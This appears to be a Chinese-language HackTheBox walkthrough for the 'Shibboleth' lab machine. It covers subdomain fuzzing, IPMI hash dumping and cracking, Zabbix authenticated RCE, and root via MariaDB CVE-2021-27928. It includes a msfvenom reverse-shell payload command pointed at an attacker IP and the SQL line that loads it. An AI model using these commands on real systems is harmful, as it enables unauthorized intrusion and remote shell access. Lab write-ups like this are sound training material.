Shibboleth - HackTheBox
Td

image

nmap扫描

image

image

image

添加hosts文件

image

扫目录

image

在利用wfuzz扫一遍子域名

字典:https://github.com/danielmiessler/SecLists

wfuzz -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb" -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hw 26

image

添加hosts文件

image

登录框,标题为zabbix,搜一下

image

但是版本不明确

扫目录

image

扫出来的大多都需要登录才能访问

在扫一遍udp端口

image

image

623开放了一个asf-rmcp服务,不认识搜一下

https://hacktricks.boitatech.com.br/pentesting/623-udp-ipmi

image

好像可以枚举ipmi服务的用户名和密码

image

image

尝试解密

image

搜索类型为7300

hashcat -m 7300 hash /usr/share/wordlists/rockyou.txt

image

登录

image

知道了当前ZABBIX的版本

image

有一个身份验证后的rce

image

image

image

漏洞产生点在hosts->key这里

image

提权

image

10050和10051不知道是什么服务,本地还开放有3306,但配置文件无权读取

image

存在另外一个普通用户,尝试用之前破解的哈希密码切换

image

提权

image

获取数据库的账号密码

image

MariaDB数据库第一次见,搜一下

image

image

https://github.com/Al1ex/CVE-2021-27928

用法也挺简单

image

先msf生成一个so后门

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=7777 -f elf-so -o cve.so

image

让靶机下载

image

在连接数据库后进行加载后门

SET GLOBAL wsrep_provider="/tmp/cve.so";

image

image